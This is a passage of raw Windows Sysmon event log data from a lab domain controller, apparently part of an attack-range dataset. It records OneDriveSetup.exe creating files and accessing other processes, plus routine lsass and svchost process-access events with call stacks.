14:58:28.404{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveMedTile.contrast-black_scale-100.pngMD5=433D5C9BFE71C70E6BF1F18B7DA188F4,SHA256=3BA55B200B58756480679CF8B6B98D7B3570F8DFCDB39186F721357DA8D8172C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079777Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.400{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\OneDrive.exeMD5=E22475A3A3FD996E6AED8FB344FC1277,SHA256=A1FBD37A3F712E6C90A94C35DB03190D221CB6BDCB33D71DCE3A68DB4E88354B,IMPHASH=0DDE6F6385D4E009D674E84073836363truetrue 10341000x800000000000000079776Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.394{A7A01FEF-B624-607E-0B00-00000000BB01}8602300C:\Windows\system32\lsass.exe{A7A01FEF-EC13-607E-450E-00000000BB01}3376C:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MicrosoftSearchInBing.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079775Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.393{A7A01FEF-B624-607E-0B00-00000000BB01}8602300C:\Windows\system32\lsass.exe{A7A01FEF-EC13-607E-450E-00000000BB01}3376C:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MicrosoftSearchInBing.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000079774Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:58:28.378{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\OneDrive.exe2021-04-20 14:58:28.378 10341000x800000000000000079773Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.376{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC14-607E-480E-00000000BB01}1980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079772Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.376{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC14-607E-480E-00000000BB01}1980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079771Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.372{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC13-607E-450E-00000000BB01}3376C:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MicrosoftSearchInBing.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079770Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.368{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-EC13-607E-430E-00000000BB01}6372C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonx64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dafb0|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000079769Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.368{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-EBFF-607E-270E-00000000BB01}6624C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dafb0|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000079768Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.368{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-EBFE-607E-1F0E-00000000BB01}3308C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dafb0|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000079767Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.368{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-EBF8-607E-DC0D-00000000BB01}1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVShNotify.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dafb0|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000079766Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.368{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dafb0|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000079765Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.368{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dafb0|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000079764Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.368{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-E388-607E-7E0A-00000000BB01}5724C:\Program Files\Suricata\suricata.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dafb0|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000079763Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.368{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-E1EF-607E-1D0A-00000000BB01}7068C:\Windows\system32\NOTEPAD.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dafb0|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000079762Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.367{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-DFEF-607E-A109-00000000BB01}6196C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dafb0|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000079761Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.367{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-DFDC-607E-9209-00000000BB01}3672C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dafb0|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000079760Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.367{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dafb0|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000079759Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.367{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft 